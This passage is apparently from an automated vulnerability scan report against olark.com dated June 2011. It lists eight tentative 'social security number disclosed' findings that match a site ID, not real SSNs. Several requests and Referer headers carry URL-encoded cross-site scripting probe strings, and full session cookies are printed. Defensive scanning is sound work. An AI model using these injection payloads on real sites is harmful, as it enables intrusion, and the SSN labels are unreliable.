user%5Busername%5D=dsfgkld%40rfjhg.com&user%5Bpassword%5D=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000042%29%3C%2Fscript%3E&user%5Bpassword_confirmation%5D=%27%22--%3E%3C%2Fstyle%
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:53:54 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "ea24fab43fd14048f9dadfb31a8d1acf"
X-Runtime: 517
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 23525
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7CzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6HnF1ZXJ5X3N0cmlu%0AZ19mb3Jfc3ByZWVkbHkiADoYbWl4cGFuZWxfcHJvcGVydGllc3sIOhZmdWxs%0Ac2NyZWVuX2xheW91dFQ6CXRlc3QiGHRlc3QxOiBsZXNzIGRldGFpbHM6EXRl%0Ac3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVwX3VybCIraHR0cDovL3d3dy5vbGFy%0Aay5jb20vc2lnbnVwL2FmdGVycGxhbnM6EWh0dHBfcmVmZXJlciIzaHR0cDov%0AL3d3dy5vbGFyay5jb20vc2lnbnVwL2NyZWF0ZV9uZXdfYWNjb3VudDoVc3By%0AZWVkbHlfcGxhbl9pZDA%3D%0A; path=/
Set-Cookie: _habla_session_id=4a02082116248b62adea1013c3315942; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...
<input type="text" value="dsfgkld@rfjhg.com" name="user[username]">
...[SNIP]...

6. Social security numbers disclosed  previous  next
There are 8 instances of this issue:

Issue background

Responses containing social security numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid SSNs and whether their disclosure within the application is appropriate.


6.1. http://www.olark.com/about  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.olark.com
Path:   /about

Issue detail

The following social security number was disclosed in the response:

Request

GET /about HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); __utmz=1.1307223738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; __ar_v4=%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A1%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A1; rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; _habla_session_id=cfe371dc86e5f42bfef191f5001b6531; olarkld=1307223735932; _oklv=1307223774815; __utma=1.582467809.1307223738.1307223738.1307223738.1; __utmc=1; __utmb=1.2.10.1307223738; km_uq=1307223777%20%2Fe%3F_n%3DViewed%2520Features%26_k%3D3225b0c50e306468d63651238f71383a01850728%26_p%3DY8WuMkTtR3KKkCr5oWZY4tS0b10%26_t%3D1307223777; km_vs=1; km_lv=1307223777

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:42:58 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "bf3a914387de784c374aaea571cf9297"
X-Runtime: 94
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 11481
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; path=/
Set-Cookie: _habla_session_id=7ef543096fed838d853cbfba74a41ee4; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...
eturn"static.olark.com/jsclient/loader0.js?ts="+(m?m[1]:(+new Date))})(document.cookie.match(/olarkld=(\d+)/)), name:"olark",methods:["configure","extend","declare","identify"]}); olark.identify('9353-431-10-4341');</script>
...[SNIP]...

6.2. http://www.olark.com/account/login  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.olark.com
Path:   /account/login

Issue detail

The following social security number was disclosed in the response:

Request

GET /account/login HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); __utmz=1.1307223738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; __ar_v4=%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A1%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A1; km_vs=1; km_lv=1307223777; km_uq=; rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; _habla_session_id=8176dac3446661bf1abbb4cfa5ec84aa; olarkld=1307223735932; _oklv=1307223779753; __utma=1.582467809.1307223738.1307223738.1307223738.1; __utmc=1; __utmb=1.4.10.1307223738

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:43:00 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "8cd3f804092786bb7afdfae4208d3d52"
X-Runtime: 13
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 11776
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; path=/
Set-Cookie: _habla_session_id=9f66e9a875d9b5043a20f0c3ecd19c68; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...
eturn"static.olark.com/jsclient/loader0.js?ts="+(m?m[1]:(+new Date))})(document.cookie.match(/olarkld=(\d+)/)), name:"olark",methods:["configure","extend","declare","identify"]}); olark.identify('9353-431-10-4341');</script>
...[SNIP]...

6.3. http://www.olark.com/assets/common.js  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.olark.com
Path:   /assets/common.js

Issue detail

The following social security number was disclosed in the response:

Request

GET /assets/common.js?1307133378 HTTP/1.1
Host: www.olark.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.olark.com/signup/create_new_account?user%5Busername%5D=4b89a%22%3E%3Cscript%3Ealert(%22FOOL%22)%3C/script%3E45e8436854bbf5511&user%5Bemail%5D=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000042%29%3C%2Fscript%3E&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&commit=Continue
Cookie: rack_session=BAh7CzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6HnF1ZXJ5X3N0cmlu%0AZ19mb3Jfc3ByZWVkbHkiAfV1c2VyJTVCdXNlcm5hbWUlNUQ9NGI4OWEiPjxz%0AY3JpcHQ%2BYWxlcnQoIkZPT0wiKTwvc2NyaXB0PjQ1ZTg0MzY4NTRiYmY1NTEx%0AJnVzZXIlNUJlbWFpbCU1RD0lMjclMjItLSUzRSUzQyUyRnN0eWxlJTNFJTND%0AJTJGc2NyaXB0JTNFJTNDc2NyaXB0JTNFYWxlcnQlMjgweDAwMDA0MiUyOSUz%0AQyUyRnNjcmlwdCUzRSZ1c2VyJTVCcGFzc3dvcmQlNUQ9JnVzZXIlNUJwYXNz%0Ad29yZF9jb25maXJtYXRpb24lNUQ9JmNvbW1pdD1Db250aW51ZToYbWl4cGFu%0AZWxfcHJvcGVydGllc3sIOhZmdWxsc2NyZWVuX2xheW91dFQ6CXRlc3QiGHRl%0Ac3QxOiBsZXNzIGRldGFpbHM6EXRlc3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVw%0AX3VybCIraHR0cDovL3d3dy5vbGFyay5jb20vc2lnbnVwL2FmdGVycGxhbnM6%0AEWh0dHBfcmVmZXJlciIzaHR0cDovL3d3dy5vbGFyay5jb20vc2lnbnVwL2Ny%0AZWF0ZV9uZXdfYWNjb3VudDoVc3ByZWVkbHlfcGxhbl9pZDA%3D%0A; _habla_session_id=5a0b42fa1664cb41db09942db149e9e1; __utmx=220293574.00012337193820629337:1:1; __utmxx=220293574.00012337193820629337:1556187:2592000; __utma=1.900938983.1307226305.1307226305.1307226305.1; __utmb=1.1.10.1307226305; __utmc=1; __utmz=1.1307226305.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; uuid=ZEaUDXHrzuVT61EgQR4wCCHGJg20Q5nZ; olark_referrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; km_ai=p6nVNyL3vgbPZf6fpECZXtkw1So; km_uq=1307226384%20%2Fs%3FReferrer%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%26_k%3D3225b0c50e306468d63651238f71383a01850728%26_p%3Dp6nVNyL3vgbPZf6fpECZXtkw1So%26_t%3D1307226384; km_vs=1; km_lv=1307226384; olarkld=1307226304339; wcsid=S9F1LSG2OWDYK06QL37SL9XM93534311; _oklv=1307226310999; hblid=RJR778H5K60T42VZRMM6QVPP93534311; olfsk=olfsk022998976582605746; __ar_v4=%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A1%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A1; _okbk=cd4%3Dtrue%2Cvi5%3D0%2Cvi4%3D1307226310891%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=9353-431-10-4341; omp__super_properties=%7B%22all%22%3A%20%7B%22distinct_id%22%3A%20%22S9F1LSG2OWDYK06QL37SL9XM93534311%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D
If-Modified-Since: Fri, 03 Jun 2011 20:36:18 GMT
If-None-Match: "57937f-102f8-4a4d4b4ab7480"-gzip

Response


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>Cleaning House!</title>
   <style type="text/
...[SNIP]...
rn "static.olark.com/jsclient/loader1.js?ts="+(a?a[1]:(+new Date))})(document.cookie.match(/olarkld=([0-9]+)/)),name:"olark",methods:["configure","extend","declare","identify"]}); olark.identify('9353-431-10-4341');/*]]>
...[SNIP]...

6.4. http://www.olark.com/features  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.olark.com
Path:   /features

Issue detail

The following social security number was disclosed in the response:

Request

GET /features HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; _habla_session_id=c513f59f44580d12d329f635af1d80ac; olarkld=1307223735932; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; _oklv=1307223737388; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); __utmz=1.1307223738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.582467809.1307223738.1307223738.1307223738.1; __utmc=1; __utmb=1.1.10.1307223738; km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_vs=1; km_lv=1307223739; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_uq=; __ar_v4=%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A1%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A1

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:42:53 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "d327c6e4b616c33c9ebf28a4fa4b75dc"
X-Runtime: 115
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 20057
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; path=/
Set-Cookie: _habla_session_id=c5d9ef3db6c76a4d0ceccce8fc262d4c; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...
eturn"static.olark.com/jsclient/loader0.js?ts="+(m?m[1]:(+new Date))})(document.cookie.match(/olarkld=(\d+)/)), name:"olark",methods:["configure","extend","declare","identify"]}); olark.identify('9353-431-10-4341');</script>
...[SNIP]...

6.5. http://www.olark.com/plans  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.olark.com
Path:   /plans

Issue detail

The following social security number was disclosed in the response:

Request

GET /plans HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); __utmz=1.1307223738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.582467809.1307223738.1307223738.1307223738.1; __utmc=1; __utmb=1.1.10.1307223738; km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_vs=1; km_lv=1307223739; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_uq=; __ar_v4=%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A1%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A1; rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; _habla_session_id=cfe371dc86e5f42bfef191f5001b6531; olarkld=1307223735932; _oklv=1307223774815

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:42:56 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "73585166b16790be50ee1499d0c4e9a0"
X-Runtime: 482
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 34761
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; path=/
Set-Cookie: _habla_session_id=9df90f1a424b82574f97a9035ce3a5e8; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...
eturn"static.olark.com/jsclient/loader0.js?ts="+(m?m[1]:(+new Date))})(document.cookie.match(/olarkld=(\d+)/)), name:"olark",methods:["configure","extend","declare","identify"]}); olark.identify('9353-431-10-4341');</script>
...[SNIP]...

6.6. http://www.olark.com/signup/create_new_account  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.olark.com
Path:   /signup/create_new_account

Issue detail

The following social security number was disclosed in the response:

Request

GET /signup/create_new_account HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); __utmz=1.1307223738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_vs=1; km_lv=1307223781; km_uq=; rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; _habla_session_id=41467b083c2e1887f5681ced3000506c; olarkld=1307223735932; _oklv=1307223782363; __utma=1.582467809.1307223738.1307223738.1307223738.1; __utmc=1; __utmb=1.5.10.1307223738; __ar_v4=HYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A2%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A2%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A2

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:43:03 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "25c7afdb94b8a957ff7c3bb7d143b407"
X-Runtime: 173
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 22903
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7CzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6HnF1ZXJ5X3N0cmlu%0AZ19mb3Jfc3ByZWVkbHkiADoYbWl4cGFuZWxfcHJvcGVydGllc3sIOhZmdWxs%0Ac2NyZWVuX2xheW91dFQ6CXRlc3QiGHRlc3QxOiBsZXNzIGRldGFpbHM6EXRl%0Ac3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVwX3VybCIraHR0cDovL3d3dy5vbGFy%0Aay5jb20vc2lnbnVwL2FmdGVycGxhbnM6EWh0dHBfcmVmZXJlcjA6FXNwcmVl%0AZGx5X3BsYW5faWQw%0A; path=/
Set-Cookie: _habla_session_id=4a4413bdb3e119b507d8e8cb566381f4; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...
eturn"static.olark.com/jsclient/loader0.js?ts="+(m?m[1]:(+new Date))})(document.cookie.match(/olarkld=(\d+)/)), name:"olark",methods:["configure","extend","declare","identify"]}); olark.identify('9353-431-10-4341');</script>
...[SNIP]...

6.7. http://www.olark.com/stylesheets/compiled/print.css  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.olark.com
Path:   /stylesheets/compiled/print.css

Issue detail

The following social security number was disclosed in the response:

Request

GET /stylesheets/compiled/print.css HTTP/1.1
Host: www.olark.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.olark.com/signup/create_new_account?user%5Busername%5D=4b89a%22%3E%3Cscript%3Ealert(%22FOOL%22)%3C/script%3E45e8436854bbf5511&user%5Bemail%5D=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000042%29%3C%2Fscript%3E&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&commit=Continue
Cookie: rack_session=BAh7CzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6HnF1ZXJ5X3N0cmlu%0AZ19mb3Jfc3ByZWVkbHkiAfV1c2VyJTVCdXNlcm5hbWUlNUQ9NGI4OWEiPjxz%0AY3JpcHQ%2BYWxlcnQoIkZPT0wiKTwvc2NyaXB0PjQ1ZTg0MzY4NTRiYmY1NTEx%0AJnVzZXIlNUJlbWFpbCU1RD0lMjclMjItLSUzRSUzQyUyRnN0eWxlJTNFJTND%0AJTJGc2NyaXB0JTNFJTNDc2NyaXB0JTNFYWxlcnQlMjgweDAwMDA0MiUyOSUz%0AQyUyRnNjcmlwdCUzRSZ1c2VyJTVCcGFzc3dvcmQlNUQ9JnVzZXIlNUJwYXNz%0Ad29yZF9jb25maXJtYXRpb24lNUQ9JmNvbW1pdD1Db250aW51ZToYbWl4cGFu%0AZWxfcHJvcGVydGllc3sIOhZmdWxsc2NyZWVuX2xheW91dFQ6CXRlc3QiGHRl%0Ac3QxOiBsZXNzIGRldGFpbHM6EXRlc3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVw%0AX3VybCIraHR0cDovL3d3dy5vbGFyay5jb20vc2lnbnVwL2FmdGVycGxhbnM6%0AEWh0dHBfcmVmZXJlciIzaHR0cDovL3d3dy5vbGFyay5jb20vc2lnbnVwL2Ny%0AZWF0ZV9uZXdfYWNjb3VudDoVc3ByZWVkbHlfcGxhbl9pZDA%3D%0A; _habla_session_id=5a0b42fa1664cb41db09942db149e9e1; __utmx=220293574.00012337193820629337:1:1; __utmxx=220293574.00012337193820629337:1556187:2592000; __utma=1.900938983.1307226305.1307226305.1307226305.1; __utmb=1.1.10.1307226305; __utmc=1; __utmz=1.1307226305.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; uuid=ZEaUDXHrzuVT61EgQR4wCCHGJg20Q5nZ; olark_referrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; km_ai=p6nVNyL3vgbPZf6fpECZXtkw1So; km_uq=; km_vs=1; km_lv=1307226306; olarkld=1307226304339; wcsid=S9F1LSG2OWDYK06QL37SL9XM93534311; _oklv=1307226310999; hblid=RJR778H5K60T42VZRMM6QVPP93534311; olfsk=olfsk022998976582605746; __ar_v4=%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A1%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A1; _okbk=cd4%3Dtrue%2Cvi5%3D0%2Cvi4%3D1307226310891%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=9353-431-10-4341; omp__super_properties=%7B%22all%22%3A%20%7B%22distinct_id%22%3A%20%22S9F1LSG2OWDYK06QL37SL9XM93534311%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D
If-Modified-Since: Fri, 03 Jun 2011 20:42:06 GMT
If-None-Match: "93005f-3cb-4a4d4c9698380"-gzip
Cache-Control: max-age=0

Response


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>Cleaning House!</title>
   <style type="text/
...[SNIP]...
rn "static.olark.com/jsclient/loader1.js?ts="+(a?a[1]:(+new Date))})(document.cookie.match(/olarkld=([0-9]+)/)),name:"olark",methods:["configure","extend","declare","identify"]}); olark.identify('9353-431-10-4341');/*]]>
...[SNIP]...

6.8. http://www.olark.com/stylesheets/compiled/screen.css  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.olark.com
Path:   /stylesheets/compiled/screen.css

Issue detail

The following social security number was disclosed in the response:

Request

GET /stylesheets/compiled/screen.css HTTP/1.1
Host: www.olark.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.olark.com/signup/create_new_account?user%5Busername%5D=4b89a%22%3E%3Cscript%3Ealert(%22FOOL%22)%3C/script%3E45e8436854bbf5511&user%5Bemail%5D=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000042%29%3C%2Fscript%3E&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&commit=Continue
